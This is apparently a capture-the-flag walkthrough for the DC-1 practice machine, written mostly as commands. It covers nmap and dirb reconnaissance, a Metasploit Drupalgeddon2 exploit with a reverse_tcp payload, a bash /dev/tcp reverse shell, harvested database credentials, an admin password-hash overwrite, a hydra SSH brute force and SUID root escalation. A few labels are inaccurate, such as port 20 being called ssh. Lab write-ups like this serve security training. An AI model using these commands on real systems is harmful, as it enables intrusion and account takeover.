DC-1 target machine practice
Step 1: Build the DC-1 and Kali virtual machines; both must be in NAT mode.
[mkdir DC-1]
[cd DC-1/]
Step 2: Scan for the target machine's IP address
[Kali: 192.168.139.143/24]
[nmap -sP 192.168.139.0/24 -oN nmap.sp]
[-sP / -sn: host discovery only, no port scan]
[-oN / -oX: save the scan results as text / XML]
Step 3: Information gathering on the target machine
[nmap -A 192.168.139.145 -p 1-65535 -oN nmap.A]
[-A: comprehensive scan]
[-p: specify the ports]
Found port 80 open
Port 20 open - ssh
Step 4: Log in to the page on port 80
[http://192.168.139.145/]
Information gathering: Drupal details
1 1.php CMS
Step 5: Scan for subdirectories
[dirb: scans with a wordlist]
[dirb http://192.168.139.145/]
Step 6: Gather information from the web pages - check the version for known vulnerabilities
[http://192.168.139.145/UPGRADE.txt]
[msfconsole]
[msf5 > search drupal]
[use exploit/unix/webapp/drupal_drupalgeddon2]
[info]
[set payload <press Tab twice to list the available payloads>]
[set payload php/meterpreter/reverse_tcp]
[show options]
[set RHOSTS 192.168.139.145]
[set LHOST 192.168.139.143]
[exploit]
[System successfully compromised]
Step 7: Get flag1
[meterpreter > cat flag1.txt]
[Every good CMS needs a config file - and so do you.]
[cat is not usable here; the hint says to look at the CMS configuration file]
[cat web.config] - view the web site's information
[cat sites]
[ls]
[cd default]
[cat settings.php]
Step 8: Get flag2
meterpreter > cat settings.php
<?php
/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
[shell]
[id]
[netstat -anptl]
Using the SSRF vulnerability, set up a reverse connection back to Kali.
Open a listening port on Kali:
[nc -lvvp 666]
[python -c 'import pty;pty.spawn("/bin/bash")']
[mysql -udbuser -pR0ck3t]
[exit]
[bash -i >& /dev/tcp/192.168.139.153/666 0>&1] start the reverse shell
Step 9: Get the username and password through the database
[show databases;]
[use drupaldb;]
[show tables;]
[select * from users\G]
[The usernames and password hashes are found]
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: [email protected]
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: [email protected]
data: b:0;
*************************** 3. row ***************************
uid: 2
name: Fred
pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
mail: [email protected]
theme:
signature:
signature_format: filtered_html
created: 1550581952
access: 1550582225
login: 1550582225
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: [email protected]
data: b:0;
3 rows in set (0.00 sec)
-----------------------------------
[Generate a new password hash and substitute it]
[cd …/]
[cd /var/www]
[php scripts/password-hash.sh 123.com]
[password: 123.com hash: $S$DWE/9WSI5iGV2JKCVy7UW7TGEzJ.kNBwVpLcliRiRf9vn1v/SEWq]
Log in to the database - replace the password
[mysql -udbuser -pR0ck3t]
[use drupaldb;]
[update users set pass="$S$DWE/9WSI5iGV2JKCVy7UW7TGEzJ.kNBwVpLcliRiRf9vn1v/SEWq" where uid=1;]
Step 10: Log in to the web admin page with password 123.com - get flag3
Step 11: Get flag4
[cat /etc/passwd]
[hydra -l flag4 -P .../passwd.txt 192.168.139.145 ssh -vV -f -o hydra.ssh]
[ssh flag4@192.168.139.145]
[ls]
[cat flag4]
-------------
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
-------------
Step 12: flag5 (privilege escalation to root)
Approach: identify commands that have the SUID bit set
[find / -perm -4000 2>/dev/null]
[find wcp -exec "/bin/sh" \;]
[# cd /root]
[# ls]
[# cat thefinalflag.txt]
and get the final banner.
--------------------------------------
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
--------------------------------------------------